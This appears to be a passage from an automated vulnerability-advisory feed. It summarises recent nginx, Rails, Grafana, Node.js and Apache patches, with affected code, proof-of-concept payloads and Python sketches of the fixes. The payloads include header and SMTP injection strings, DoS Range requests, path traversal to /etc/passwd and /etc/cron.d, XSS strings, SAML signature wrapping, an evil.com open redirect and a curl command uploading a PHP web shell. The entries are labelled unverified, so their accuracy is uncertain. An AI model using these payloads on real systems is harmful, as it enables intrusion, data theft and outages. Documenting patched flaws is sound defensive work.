Before the patch, when nginx's mail module resolved a client's IP address to a hostname, it used the resolved hostname without validation in auth_http requests and SMTP proxy communications. An attacker controlling DNS responses could return a hostname containing newlines, spaces, or other special characters, enabling injection of arbitrary headers into auth_http requests or arbitrary SMTP commands into the proxied SMTP session. The patch validates that the resolved hostname only contains RFC 1034-compliant characters (letters, digits, hyphens, dots).

🔍 View Affected Code & PoC

Affected Code

s->host.data = ngx_pstrdup(c->pool, &ctx->name);
// ctx->name is used directly without validation after reverse DNS resolution

Proof of Concept

An attacker controls DNS for their IP (e.g., 1.2.3.4). They configure the PTR record to return: 'evil.com\r\nX-Injected-Header: malicious' or 'evil.com\r\nMAIL FROM:<[email protected]>\r\nRCPT TO:<[email protected]>'. When nginx resolves the client IP and gets this crafted hostname, it is used verbatim in auth_http HTTP request headers (e.g., as Client-Host) or in SMTP proxy greeting, allowing HTTP header injection or SMTP command injection.
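A sketch of the patch's character allowlist, as a Python regex (illustrative; nginx's actual validation is in C):

```python
import re

# Accept only letters, digits, hyphens, and dots, in the spirit of the
# patch's RFC 1034 character check (a sketch, not the nginx code).
HOSTNAME_RE = re.compile(r'^[A-Za-z0-9.-]+$')

def resolved_hostname_ok(name):
    return bool(HOSTNAME_RE.match(name))

assert resolved_hostname_ok("mail.example.com")
# Crafted PTR responses with CRLF or spaces are rejected before they
# can reach auth_http headers or the proxied SMTP session:
assert not resolved_hostname_ok("evil.com\r\nMAIL FROM:<[email protected]>")
assert not resolved_hostname_ok("evil.com extra")
```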

⚠️ MEDIUM UNVERIFIED Null Pointer Dereference

Mar 18, 2026, 12:39 PM — nginx/nginx

Commit: 9bc1371

Author: Sergey Kandaurov

When authenticating with CRAM-MD5 or APOP methods, the code set `s->passwd.data = NULL` but did not reset `s->passwd.len`. On a subsequent authentication attempt, the non-zero length would cause the code to attempt to use the null pointer as if it pointed to valid password data, resulting in a null pointer dereference and worker process crash. The fix uses `ngx_str_null(&s->passwd)`, which zeroes both the data pointer and the length.

🔍 View Affected Code & PoC

Affected Code

s->passwd.data = NULL;

Proof of Concept

1. Configure nginx mail proxy with CRAM-MD5 auth method and auth_http backend.
2. Connect to the mail service and authenticate using CRAM-MD5 (first attempt succeeds or fails normally).
3. On the same connection or a new connection handled by the same worker, attempt a second CRAM-MD5 authentication.
4. The worker process crashes with a null pointer dereference because s->passwd.len is non-zero but s->passwd.data is NULL, causing nginx to attempt to read from address 0x0 when constructing the next auth HTTP request.
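The inconsistent reset can be modeled in Python (a loose analogue; the real crash is a NULL dereference in C):

```python
# Analogue of the inconsistent reset: the length stays non-zero
# while the data pointer is cleared, so the next read dereferences NULL.
class NgxStr:
    def __init__(self, data):
        self.data = data
        self.len = len(data)

passwd = NgxStr(b"hunter2")

# Buggy cleanup (the pre-patch code): clears data only.
passwd.data = None

try:
    _ = passwd.data[:passwd.len]   # worker-crash analogue
    crashed = False
except TypeError:
    crashed = True
assert crashed

# The fix (ngx_str_null) zeroes both fields, so callers that check
# len == 0 never touch the cleared pointer.
passwd.data, passwd.len = None, 0
assert passwd.len == 0
```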

🔥 HIGH UNVERIFIED Buffer Overread/Overwrite

Feb 21, 2026, 08:04 AM — nginx/nginx

Commit: 7725c37

Author: Roman Arutyunyan

The nginx mp4 module had off-by-one errors in bounds checking for stco and co64 atoms. When `trak->start_chunk` equaled `trak->chunks` (i.e., pointing exactly past the end of the chunks array), the old check `trak->start_chunk > trak->chunks` would pass, allowing out-of-bounds memory access. Similarly, empty stsz sample arrays could be processed, leading to buffer overread/overwrite. The patch changes `>` to `>=` to properly reject these boundary cases.

🔍 View Affected Code & PoC

Affected Code

if (trak->start_chunk > trak->chunks) {
    ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0,
                  "start time is out mp4 stco chunks in \"%s\"",
                  mp4->file.name.data);
    return NGX_ERROR;
}

Proof of Concept

Craft an MP4 file where the stco/co64 atom contains exactly N chunk entries, but the computed start_chunk equals N (pointing one past the end). With the old check (start_chunk > chunks), start_chunk == chunks passes and subsequent code reads/writes memory at chunks[N], one element past the allocated buffer. A crafted MP4 with a seek start time that maps to start_chunk == chunks (e.g., a start time after all samples) triggers it: GET /video.mp4?start=<time_after_last_sample>, causing an out-of-bounds memory read/write in the chunk offset update loop.
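The off-by-one is the whole story here; a minimal Python model of the old and new checks:

```python
# Boundary check: valid chunk indices run 0..chunks-1; a start_chunk
# equal to chunks points one element past the array.
chunks = 16

def old_check_rejects(start_chunk):
    return start_chunk > chunks    # pre-patch: '>' misses the boundary

def new_check_rejects(start_chunk):
    return start_chunk >= chunks   # patch: '>=' rejects it

start_chunk = chunks  # one past the end, as in the crafted MP4
assert not old_check_rejects(start_chunk)  # OOB access would follow
assert new_check_rejects(start_chunk)      # properly rejected
```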

🔥 HIGH UNVERIFIED Denial of Service (Resource Exhaustion)

Dec 2, 2025, 09:12 AM — rails/rails

Commit: 5b66fcf

Author: Gannon McGibbon

Before the patch, an attacker could send an HTTP Range request with an arbitrarily large byte range (e.g., 'bytes=0-' on a large file) and the server would attempt to download and buffer the entire requested range into memory before sending it. This could exhaust server memory and cause a denial of service. The patch adds a `ranges_valid?` check that rejects any byte ranges whose total size exceeds 100MB (configurable via `ActiveStorage.streaming_chunk_max_size`).

🔍 View Affected Code & PoC

Affected Code

return head(:range_not_satisfiable) if ranges.blank? || ranges.all?(&:blank?)

Proof of Concept

Send an HTTP GET request with a Range header covering the entire file or a very large portion of a large blob:

GET /rails/active_storage/blobs/proxy/:signed_id/:filename HTTP/1.1
Host: target.example.com
Range: bytes=0-

With a multi-gigabyte file stored, this would cause the server to call blob.download_chunk(0..file_size) and load gigabytes into memory. Multiple concurrent such requests would exhaust available RAM and crash the server process. A multi-range attack is also possible:
Range: bytes=0-999999999,1000000000-1999999999
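A sketch of a ranges_valid?-style guard in Python (names and the 100 MB default are taken from the description above; the real implementation is Ruby):

```python
# Illustrative guard: reject requests whose combined range size
# exceeds a configurable cap, as the patch does.
MAX_TOTAL = 100 * 1024 * 1024  # 100 MiB cap, per the description

def ranges_valid(ranges, limit=MAX_TOTAL):
    # ranges is a list of (first, last) byte offsets, inclusive
    total = sum(last - first + 1 for first, last in ranges)
    return total <= limit

blob_size = 5 * 1024**3                        # a 5 GiB blob
assert not ranges_valid([(0, blob_size - 1)])  # 'bytes=0-' is rejected
assert ranges_valid([(0, 1023)])               # small ranges still served
```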

🔥 HIGH UNVERIFIED Denial of Service (DoS) via Multi-Range HTTP Requests

Apr 9, 2025, 11:54 AM — rails/rails

Commit: bb78f8c

Author: Jean Boussier

The ActiveStorage streaming controller allowed multi-range HTTP byte range requests without limiting the number of ranges. An attacker could send a request with thousands of byte ranges, causing the server to download and assemble many chunks from storage in memory, exhausting server resources and potentially causing a DoS. The patch adds a configurable `streaming_max_ranges` limit (defaulting to 1) that rejects requests with more ranges than allowed.

🔍 View Affected Code & PoC

Affected Code

ranges = Rack::Utils.get_byte_ranges(range_header, blob.byte_size)

return head(:range_not_satisfiable) unless ranges_valid?(ranges)

if ranges.length == 1

Proof of Concept

Send a request with thousands of byte ranges to exhaust server memory/connections:

curl -H 'Range: bytes=0-1,2-3,4-5,6-7,8-9,10-11,...(repeat 10000 times)' https://example.com/rails/active_storage/blobs/proxy/SIGNED_ID/file.bin

Each range causes a separate blob.download_chunk() call and all data is accumulated in memory (data << chunk), so 10000 ranges against a large file would download massive amounts of data and hold it all in RAM, potentially crashing the Rails server.
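The complementary count limit can be sketched the same way (Python; the streaming_max_ranges default of 1 is from the description above):

```python
# Illustrative guard: cap the number of ranges per request.
def ranges_allowed(ranges, max_ranges=1):
    return len(ranges) <= max_ranges

many = [(i, i + 1) for i in range(0, 20000, 2)]  # 10000 tiny ranges
assert not ranges_allowed(many)       # multi-range flood rejected
assert ranges_allowed([(0, 1023)])    # single range still fine
```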

🔥 HIGH UNVERIFIED Denial of Service (ReDoS/Resource Exhaustion)

Jun 11, 2025, 03:48 PM — rails/rails

Commit: 64fabbd

Author: Jean Boussier

BigDecimal in Ruby supports scientific notation (e.g., '9e99999999'), allowing an attacker to pass a short string that causes BigDecimal to allocate an enormous amount of memory when converting the number. Before the patch, any user-controlled string passed to number helper functions (like number_to_currency or number_to_percentage) could trigger this via BigDecimal(number). The patch rejects strings containing 'e' or 'd' (scientific notation indicators) before attempting BigDecimal conversion.

🔍 View Affected Code & PoC

Affected Code

when String
  BigDecimal(number, exception: false)

Proof of Concept

# Sending a tiny string that causes massive memory allocation:
require 'active_support/number_helper'
include ActiveSupport::NumberHelper

# This causes BigDecimal to allocate gigabytes of memory and hang
number_to_currency('9e99999999')  # Before patch: allocates enormous BigDecimal
number_to_currency('1e1000000')   # Similarly, causes DoS via memory exhaustion

# In a Rails app, an attacker can send: POST /payments?amount=9e99999999
# which would cause the server process to hang/crash when formatting the number
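A Python sketch of the patch's approach, using decimal.Decimal as a stand-in for Ruby's BigDecimal (Python's Decimal stores exponents compactly, so the rejection here is shown for parity with the Ruby fix rather than out of necessity):

```python
from decimal import Decimal

# Reject exponent notation before converting a user-supplied string
# to an arbitrary-precision number, as the patch does for BigDecimal.
def safe_parse(number):
    if any(ch in number for ch in "eEdD"):
        return None   # scientific notation: refuse to expand it
    try:
        return Decimal(number)
    except ArithmeticError:
        return None

assert str(safe_parse("19.99")) == "19.99"
assert safe_parse("9e99999999") is None   # 11 bytes in, gigabytes out (in Ruby)
```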

⚠️ MEDIUM UNVERIFIED Improper Input Validation / Internal State Manipulation

Jan 7, 2026, 07:53 AM — rails/rails

Commit: 0dbaa44

Author: Jean Boussier

Before the patch, users could set protected metadata keys (analyzed, identified, composed) during a direct upload by including them in the metadata parameter. These keys control internal Active Storage state (e.g., whether a blob has been analyzed or identified), so a malicious user could set 'analyzed: true' or 'identified: true' to bypass file analysis/identification steps that might enforce security policies. The patch filters out these protected keys from user-supplied metadata in create_before_direct_upload!.

🔍 View Affected Code & PoC

Affected Code

def create_before_direct_upload!(key: nil, filename:, byte_size:, checksum:, content_type: nil, metadata: nil, service_name: nil, record: nil)
  create! key: key, filename: filename, byte_size: byte_size, checksum: checksum, content_type: content_type, metadata: metadata, service_name: service_name
end

Proof of Concept

POST /rails/active_storage/direct_uploads
Content-Type: application/json

{"blob":{"filename":"malicious.exe","byte_size":1000,"checksum":"abc123","content_type":"application/octet-stream","metadata":{"analyzed":true,"identified":true}}}

This causes the blob to be marked as already analyzed and identified, bypassing any content analysis or identification checks that could enforce content type policies or detect malicious files.
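The fix boils down to key filtering; a Python sketch (protected key names from the description above):

```python
# Strip internal Active Storage state keys from user-supplied metadata
# before creating the blob (illustrative model of the Ruby fix).
PROTECTED_KEYS = {"analyzed", "identified", "composed"}

def sanitize_metadata(metadata):
    return {k: v for k, v in metadata.items() if k not in PROTECTED_KEYS}

user_metadata = {"analyzed": True, "identified": True, "caption": "cat"}
assert sanitize_metadata(user_metadata) == {"caption": "cat"}
```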

⚠️ MEDIUM UNVERIFIED XSS (Cross-Site Scripting)

Mar 4, 2026, 09:02 AM — rails/rails

Commit: 6b313e2

Author: Jean Boussier

The `SafeBuffer#%` method failed to preserve the unsafe status of a SafeBuffer when used for string formatting. Before the patch, formatting an unsafe SafeBuffer (one that had been marked unsafe after mutation via gsub!, etc.) would return a new SafeBuffer that was incorrectly marked as html_safe?, allowing unescaped user input to be rendered as raw HTML. The fix propagates the `@html_unsafe` flag to the result of `%` formatting.

🔍 View Affected Code & PoC

Affected Code

def %(args)
  case args
  when Hash
    escaped_args = args.transform_values { |arg| explicit_html_escape_interpolated_argument(arg) }
  else
    escaped_args = Array(args).map { |arg| explicit_html_escape_interpolated_argument(arg) }
  end
  self.class.new(super(escaped_args))
end

Proof of Concept

# Before the patch:
unsafe_buffer = ActiveSupport::SafeBuffer.new
unsafe_buffer.gsub!('', '<%{name}>')  # marks buffer as unsafe
puts unsafe_buffer.html_safe?  # => false (correct)
result = unsafe_buffer % { name: '<script>alert(1)</script>' }
puts result.html_safe?  # => true (BUG! should be false)
# result contains unescaped '<script>alert(1)</script>' and is treated as safe
# When rendered in a Rails view, this would output raw script tags without escaping
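A Python analogue of the flag propagation (illustrative; ActiveSupport::SafeBuffer is a Ruby String subclass):

```python
# A "safe string" must propagate its unsafe flag through % formatting
# instead of minting a fresh, wrongly-safe result.
class SafeBuffer(str):
    def __new__(cls, value="", unsafe=False):
        obj = super().__new__(cls, value)
        obj.unsafe = unsafe
        return obj

    def html_safe(self):
        return not self.unsafe

    def __mod__(self, args):
        # Pre-patch bug: the result was always created with unsafe=False.
        # The fix carries the flag over, as modeled here.
        return SafeBuffer(str.__mod__(str(self), args), unsafe=self.unsafe)

buf = SafeBuffer("<%(name)s>", unsafe=True)
result = buf % {"name": "<script>alert(1)</script>"}
assert not result.html_safe()   # unsafe status preserved
```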

🔥 HIGH UNVERIFIED Path Traversal

Mar 13, 2026, 02:39 PM — rails/rails

Commit: 1a5e2f6

Author: Mike Dalessio

ActiveStorage's DiskService allowed path traversal via blob keys containing segments like '../../etc/passwd'. The `path_for` method directly joined the root directory with user-controlled key values without validating that the resolved path stayed within the storage root, allowing attackers to read or write arbitrary files on the server filesystem. The patch adds validation that rejects keys with dot segments and verifies the resolved path remains within the storage root directory.

🔍 View Affected Code & PoC

Affected Code

def path_for(key) # :nodoc:
  File.join root, folder_for(key), key
end

Proof of Concept

# Attacker generates a valid signed URL with a path traversal key (e.g., by intercepting/forging a blob_key token)
# OR if the application allows custom blob keys from user input:

# Step 1: Generate a signed blob key token with traversal payload
encoded_key = ActiveStorage.verifier.generate(
  { key: "../../etc/passwd", disposition: "inline", content_type: "text/plain", service_name: "local" },
  purpose: :blob_key
)

# Step 2: Request the file via DiskController
# GET /rails/active_storage/disk/<encoded_key>/hello.txt
# DiskService#path_for("../../etc/passwd") resolves to /storage_root/xx/yy/../../etc/passwd => /etc/passwd
# Server responds with contents of /etc/passwd

# Similarly for write (direct upload):
encoded_token = ActiveStorage.verifier.generate(
  { key: "../../etc/cron.d/evil", content_type: "text/plain", content_length: 20, checksum: "...", service_name: "local" },
  purpose: :blob_token
)
# PUT /rails/active_storage/disk/<encoded_token> with malicious payload writes to /etc/cron.d/evil
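A containment check along the lines of the patch can be sketched in Python (the real fix is in Ruby and also normalizes keys differently):

```python
import os

# Reject dot segments, then verify the resolved path stays inside the
# storage root (illustrative model of the DiskService fix).
def safe_path_for(root, key):
    if ".." in key.split("/"):
        raise ValueError("dot segment in key")
    real_root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, key))
    if os.path.commonpath([candidate, real_root]) != real_root:
        raise ValueError("key escapes storage root")
    return candidate

ok = safe_path_for("/var/storage", "ab/cd/abcdef")
assert ok.endswith("ab/cd/abcdef")

try:
    safe_path_for("/var/storage", "../../etc/passwd")
    escaped = True
except ValueError:
    escaped = False
assert not escaped
```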

⚠️ MEDIUM UNVERIFIED Glob Injection / Arbitrary File Deletion

Mar 13, 2026, 02:59 PM — rails/rails

Commit: 8fdf7da

Author: Mike Dalessio

Before the patch, `DiskService#delete_prefixed` passed a user-influenced blob key directly into `Dir.glob` without escaping glob metacharacters. If a blob key contained characters like `*`, `?`, `[`, `]`, `{`, or `}`, the glob expansion could match and delete unintended files on the filesystem. The patch escapes all glob metacharacters in the resolved path before passing it to `Dir.glob`.

🔍 View Affected Code & PoC

Affected Code

def delete_prefixed(prefix)
  instrument :delete_prefixed, prefix: prefix do
    Dir.glob(path_for("#{prefix}*")).each do |path|
      FileUtils.rm_rf(path)
    end
  end
end

Proof of Concept

# Attacker uploads a blob with a key containing glob metacharacters:
# key = "abc*/sensitive_data"
# When Blob#delete is called, it invokes delete_prefixed with a prefix derived from this key.
# The resulting Dir.glob call becomes:
#   Dir.glob("/storage/root/abc*/sensitive_data*")
# This matches ALL directories starting with 'abc' followed by any characters,
# potentially deleting files belonging to other blobs or even other application data.

# Concrete example:
service = ActiveStorage::Service::DiskService.new(root: "/var/storage")
# If prefix = "ab*" (derived from a crafted blob key)
# Dir.glob("/var/storage/ab**") expands to match ALL files under /var/storage starting with 'ab'
# effectively wiping out all blobs whose storage path starts with 'ab'
service.delete_prefixed("ab*")  # Before patch: deletes all files matching /var/storage/ab**
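In Python terms, the fix is one call to glob.escape (standing in for the patch's Ruby escaping helper):

```python
import glob

# Escape glob metacharacters in the prefix before appending the
# trailing wildcard, so crafted keys match literally.
prefix = "ab*"  # crafted blob-key prefix containing a metacharacter

unsafe_pattern = f"/var/storage/{prefix}*"      # "ab**": matches too much
safe_pattern = glob.escape(f"/var/storage/{prefix}") + "*"

assert unsafe_pattern.endswith("ab**")
assert safe_pattern == "/var/storage/ab[*]*"    # '*' now matches literally
```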

🔥 HIGH UNVERIFIED Mutation XSS (mXSS)

Mar 16, 2026, 04:06 PM — rails/rails

Commit: 12db701

Author: Mike Dalessio

When a blank string is used as an HTML attribute name in Rails Action View tag helpers, `xml_name_escape` returns an empty string, producing malformed HTML like `<img src="/safe.png" ="/onerror=alert(1)">`. This malformed HTML can be parsed differently by different HTML parsers, enabling mutation XSS attacks where a browser's HTML parser interprets the malformed attribute as executable code. The patch fixes this by skipping blank attribute keys before they are rendered into HTML.

🔍 View Affected Code & PoC

Affected Code

options.each_pair do |key, value|
  type = TAG_TYPES[key]
  if type == :data && value.is_a?(Hash)
    value.each_pair do |k, v|
      next if v.nil?

Proof of Concept

# In a Rails view, attacker-controlled data reaches tag helper:
tag("img", "src" => "/nonexistent.png", "" => "/onerror=alert(1)")
# Produces before patch: <img src="/nonexistent.png" ="/onerror=alert(1)" />
# The blank attribute name with value containing event handler can be interpreted
# by some HTML parsers as: <img src="/nonexistent.png" /onerror=alert(1)>
# triggering JavaScript execution (mXSS). Reference: HackerOne report #3078929
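A Python model of the fixed rendering path, skipping blank attribute names (illustrative; Action View's helper does considerably more):

```python
from html import escape

# Render an img tag, dropping blank attribute names so the malformed
# `="/onerror=..."` fragment never reaches the HTML.
def img_tag(attrs):
    parts = []
    for key, value in attrs.items():
        if not key.strip():
            continue   # the patch: blank keys are skipped
        parts.append(f'{key}="{escape(str(value), quote=True)}"')
    return "<img " + " ".join(parts) + " />"

attrs = {"src": "/nonexistent.png", "": "/onerror=alert(1)"}
assert img_tag(attrs) == '<img src="/nonexistent.png" />'
```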

⚠️ MEDIUM UNVERIFIED XSS (Cross-Site Scripting)

Mar 17, 2026, 05:16 PM — rails/rails

Commit: 4df8089

Author: John Hawthorn

The debug exceptions layout template used `raw` to output the exception message inside a `<script type="text/plain">` tag without HTML escaping. An attacker who can trigger an exception with a crafted message containing HTML/JavaScript could inject arbitrary script tags that would be rendered in the browser. The patch removes `raw` to use default ERB HTML escaping, ensuring special characters like `<` and `>` are escaped.

🔍 View Affected Code & PoC

Affected Code

<script type="text/plain" id="exception-message-for-copy"><%= raw @exception_message_for_copy %></script>

Proof of Concept

Trigger an exception with message: `x</script><script>alert(1)</script>` (e.g., `raise "x</script><script>alert(1)</script>"`). Before the patch, visiting the error page would execute `alert(1)` in the browser because the raw exception message closes the existing script tag and opens a new executable one. After the patch, the output is HTML-escaped as `&lt;script&gt;alert(1)&lt;/script&gt;`.
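The effect of dropping raw, shown with Python's html.escape as a stand-in for ERB's default escaping:

```python
import html

# Default escaping keeps the attacker's message from closing the
# surrounding <script type="text/plain"> container.
message = 'x</script><script>alert(1)</script>'
escaped = html.escape(message)

assert "</script>" not in escaped
assert escaped == "x&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;"
```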

🔥 HIGH UNVERIFIED Broken Access Control / Privilege Escalation

Mar 20, 2026, 11:02 PM — grafana/grafana

Commit: aa672a7

Author: Tito Lins

Before this patch, the GET /api/alertmanager/grafana/config/api/v1/alerts endpoint (which returns the raw Alertmanager configuration blob, potentially containing sensitive credentials like SMTP passwords, webhook secrets, and API tokens) was accessible to any user with the broad 'alert.notifications:read' permission, which was granted to Viewers and Editors. Similarly, GET /config/history and POST /config/history/{id}/_activate were accessible to users with alert.notifications:read/write. The patch restricts these endpoints to admin-only via new fine-grained RBAC actions (alert.notifications.config-history:read/write).

🔍 View Affected Code & PoC

Affected Code

case http.MethodGet + "/api/alertmanager/grafana/config/api/v1/alerts":
    eval = ac.EvalPermission(ac.ActionAlertingNotificationsRead)
case http.MethodGet + "/api/alertmanager/grafana/config/history":
    eval = ac.EvalPermission(ac.ActionAlertingNotificationsRead)

Proof of Concept

As a non-admin Grafana user (Viewer or Editor role) with alert.notifications:read permission, send: GET /api/alertmanager/grafana/config/api/v1/alerts with a valid session cookie. Before the patch, this returns the full raw Alertmanager config including SMTP credentials, webhook URLs with secrets, and API keys. Example: curl -H 'Cookie: grafana_session=<viewer_session>' https://grafana.example.com/api/alertmanager/grafana/config/api/v1/alerts

⚠️ MEDIUM UNVERIFIED Integer Overflow / Division by Zero

Mar 20, 2026, 05:25 PM — nodejs/node

Commit: 7547e79

Author: Node.js GitHub Bot

The patch fixes ICU-23109 in nfrule.cpp, where `util64_pow(rule1->radix, rule1->exponent)` could overflow to zero, causing a subsequent modulo-by-zero operation (`rule1->baseValue % util64_pow(rule1->radix, rule1->exponent)`). While there was already a comment about preventing `% 0`, the existing check `rule1->radix != 0` did not guard against the case where the power computation itself overflows to zero. The patch introduces a pre-computed `mod` variable with an explicit overflow check, returning an error status if mod is zero.

🔍 View Affected Code & PoC

Affected Code

if ((rule1->baseValue > 0
    && (rule1->radix != 0) // ICU-23109 Ensure next line won't "% 0"
    && (rule1->baseValue % util64_pow(rule1->radix, rule1->exponent)) == 0)

Proof of Concept

Construct an ICU RuleBasedNumberFormat rule whose radix and exponent make util64_pow(radix, exponent) wrap uint64_t to exactly 0, e.g., radix=2 with exponent=64, or radix=10 with exponent >= 64 (10^64 is a multiple of 2^64). This triggers a modulo-by-zero in `rule1->baseValue % 0`, which is undefined behavior in C++ and can cause a crash (SIGFPE or abort) when parsing/formatting numbers with such rules in Node.js via the Intl API.
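Because uint64 multiplication is arithmetic mod 2^64, the overflow-to-zero condition can be checked exactly in Python:

```python
# Modular model of util64_pow: uint64 arithmetic wraps mod 2**64.
M = 2**64

def util64_pow(radix, exponent):
    return pow(radix, exponent, M)

assert util64_pow(10, 20) != 0      # overflows uint64, but not to zero
assert util64_pow(2, 64) == 0       # wraps to exactly zero
assert util64_pow(10, 64) == 0      # 10**64 is a multiple of 2**64

# The patch's guard, in spirit: compute the modulus once and bail out
# before evaluating baseValue % mod when it wrapped to zero.
mod = util64_pow(10, 64)
assert mod == 0   # would have been a % 0 -> SIGFPE in C++
```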

💣 CRITICAL UNVERIFIED XML Signature Wrapping / Authentication Bypass

Mar 20, 2026, 09:36 AM — grafana/grafana

Commit: fa9639f

Author: Matheus Macabu

GHSA-479m-364c-43vc describes a vulnerability in github.com/russellhaering/goxmldsig (used for SAML XML digital signature validation) where an attacker could bypass XML signature verification. The library also depends on github.com/beevik/etree for XML parsing, and the combination of versions before this fix allowed signature wrapping attacks where a malicious SAML response could include a valid signature over one element while the actual authenticated data came from a different, attacker-controlled element. This allowed authentication bypass in Grafana's SAML SSO implementation.

🔍 View Affected Code & PoC

Affected Code

github.com/russellhaering/goxmldsig v1.4.0
github.com/beevik/etree v1.4.1

Proof of Concept

Craft a malicious SAML Response with XML Signature Wrapping:
1. Obtain a valid signed SAML assertion (or intercept one)
2. Wrap it in a crafted XML structure:
<samlp:Response>
  <Signature xmlns="..."><!-- valid signature over benign Assertion --></Signature>
  <saml:Assertion><!-- attacker-controlled assertion with admin privileges -->
    <saml:Subject><saml:NameID>[email protected]</saml:NameID></saml:Subject>
    <saml:AttributeStatement>
      <saml:Attribute Name="role"><saml:AttributeValue>Admin</saml:AttributeValue></saml:Attribute>
    </saml:AttributeStatement>
  </saml:Assertion>
</samlp:Response>
3. The vulnerable goxmldsig v1.4.0 would verify the signature over the benign element but the application would process the attacker's assertion, granting admin access without valid credentials.

⚠️ MEDIUM UNVERIFIED Open Redirect

Mar 19, 2026, 11:44 AM — grafana/grafana

Commit: c62113e

Author: Ezequiel Victorero

The Grafana short URL feature allowed authenticated users to create short URLs with arbitrary target paths, including external URLs like `http://evil.com` or protocol-relative URLs like `//evil.com`. When a victim clicked a Grafana short URL, they would be silently redirected to the attacker-controlled external domain. The patch adds validation at both creation time and redirect time to ensure paths are always relative and cannot contain schemes, protocol-relative prefixes, or other external URL patterns.

🔍 View Affected Code & PoC

Affected Code

// No validation of the path before storing or redirecting
shortURL, err := hs.ShortURLService.CreateShortURL(c.Req.Context(), c.SignedInUser, cmd)
// ...
c.Redirect(setting.ToAbsUrl(shortURL.Path), http.StatusFound)

Proof of Concept

1. Authenticate to Grafana as any signed-in user
2. POST /api/short-urls with body: {"path": "//evil.com/phishing-page"}
3. Receive response with a short URL like: https://grafana.example.com/goto/AbCdEfGh
4. Send this short URL to a victim - when clicked, browser follows redirect to //evil.com/phishing-page (interpreted as https://evil.com/phishing-page)

Alternatively: POST /api/short-urls with body: {"path": "http://evil.com"} to redirect to an explicit external URL.
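A sketch of the relative-path validation in Python (illustrative; Grafana's check is in Go and covers more variants):

```python
# Accept only in-app relative paths: no scheme, no protocol-relative
# prefix, must start with a single '/'.
def path_is_relative(path):
    if "://" in path:
        return False          # explicit scheme, e.g. http://evil.com
    if path.startswith("//") or path.startswith("/\\"):
        return False          # protocol-relative or backslash variant
    return path.startswith("/")

assert path_is_relative("/d/abc/my-dashboard")
assert not path_is_relative("//evil.com/phishing-page")
assert not path_is_relative("http://evil.com")
```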

🔥 HIGH UNVERIFIED Denial of Service / HTTP/2 Protocol Vulnerability

Mar 19, 2026, 10:22 AM — grafana/grafana

Commit: 5a117a2

Author: Hugo Häggmark

This commit patches CVE-2026-33186 in the google.golang.org/grpc library by upgrading from v1.79.1 to v1.79.3. The vulnerability exists in the gRPC-Go HTTP/2 implementation and can be exploited to cause a denial of service condition. The patch updates the dependency across multiple Go modules in the Grafana repository to remediate the vulnerability.

🔍 View Affected Code & PoC

Affected Code

google.golang.org/grpc v1.79.1

Proof of Concept

A malicious client connecting to any gRPC endpoint could send specially crafted HTTP/2 frames to exploit the vulnerability in grpc-go v1.79.1, causing the server to crash or become unresponsive. For example: using a gRPC client to send malformed/crafted HTTP/2 HEADERS or DATA frames to a Grafana gRPC service endpoint, triggering the DoS condition in the affected grpc-go HTTP/2 handler code.

🔥 HIGH UNVERIFIED Improper Access Control / Authentication Bypass

Mar 18, 2026, 08:46 PM — apache/httpd

Commit: e8b5fdc

Author: Rich Bowen

The original example configuration had 'Require all granted' at the Directory level, which grants unauthenticated access to all users by default. The LimitExcept block only required authentication for non-GET/POST/OPTIONS methods, but the outer 'Require all granted' could override authentication requirements depending on configuration context. The patch removes 'Require all granted' and replaces the LimitExcept approach with a RequireAny block that properly requires either the correct HTTP method OR an authenticated admin user, ensuring write operations require authentication.

🔍 View Affected Code & PoC

Affected Code

<Directory "/usr/local/apache2/htdocs/foo">
    Require all granted
    Dav On
    ...
    <LimitExcept GET POST OPTIONS>
        Require user admin
    </LimitExcept>

Proof of Concept

With the old config, an unauthenticated user could perform WebDAV write operations: `curl -X PUT http://example.com/foo/malicious.php -d '<?php system($_GET["cmd"]); ?>'`. The 'Require all granted' directive grants access to all users and, depending on Apache's authorization merging behavior, could allow unauthenticated PUT/DELETE/MKCOL requests to modify server files, potentially leading to remote code execution.

⚠️ MEDIUM UNVERIFIED Authorization Bypass / Privilege Escalation

Mar 18, 2026, 11:18 AM — grafana/grafana

Commit: d46801e

Author: Roberto Jiménez Sánchez

Before the patch, a resource manager could be changed directly from one manager to another (e.g., from repo:abc to terraform:xyz) in a single update operation without going through a remove-then-add workflow. This allowed one management system (e.g., Terraform) to silently take over resources managed by another system (e.g., a Git repository), potentially leading to unauthorized control over managed resources and unpredictable reconciliation conflicts. The patch adds an explicit check that blocks any update where both old and new objects have a manager set but with different values, returning HTTP 403.

🔍 View Affected Code & PoC

Affected Code

managerNew, okNew := obj.GetManagerProperties()
managerOld, okOld := old.GetManagerProperties()
if managerNew == managerOld || (okNew && !okOld) { // added manager is OK
    return nil
}

Proof of Concept

// A resource managed by repo:abc can be hijacked by terraform:xyz in one step:
// 1. GET /apis/dashboard.grafana.app/v1beta1/namespaces/default/dashboards/dashboard-uid
// 2. Modify annotations and PUT/UPDATE:
// annotations["grafana.app/manager-kind"] = "terraform"
// annotations["grafana.app/manager-identity"] = "attacker-terraform-workspace"
// PUT /apis/dashboard.grafana.app/v1beta1/namespaces/default/dashboards/dashboard-uid
// Before patch: returns 200 OK, resource is now managed by terraform instead of repo
// After patch: returns 403 Forbidden with message 'Cannot change resource manager; remove the existing manager first, then add the new one'

⚠️ MEDIUM UNVERIFIED Broken Access Control

Mar 17, 2026, 11:28 PM — grafana/grafana

Commit: 1c12cf1

Author: Stephanie Hingtgen

Before this patch, the Grafana Live push endpoint (`/api/live/push/:streamId`) had no RBAC authorization check, allowing any authenticated user (including Viewers) to push metrics and events to Grafana Live streams. The patch adds an `authorize(ac.EvalPermission(ac.ActionLivePush))` middleware that restricts this endpoint to users with the `live:push` permission (granted to Editors and Admins by default).

🔍 View Affected Code & PoC

Affected Code

liveRoute.Post("/push/:streamId", hs.LivePushGateway.Handle)

Proof of Concept

As a Viewer-role user with valid session credentials, send: POST /api/live/push/anystream with body `cpu usage=0.5` and a valid session cookie or API key. Before the patch, this would return HTTP 200 and successfully push data to the stream. After the patch, it returns HTTP 403.

⚠️ MEDIUM UNVERIFIED Cross-Origin Request Forgery / Unauthorized Access to Dev Resources

Mar 17, 2026, 11:02 PM — vercel/next.js

Commit: b2b802c

Author: Zack Tanner

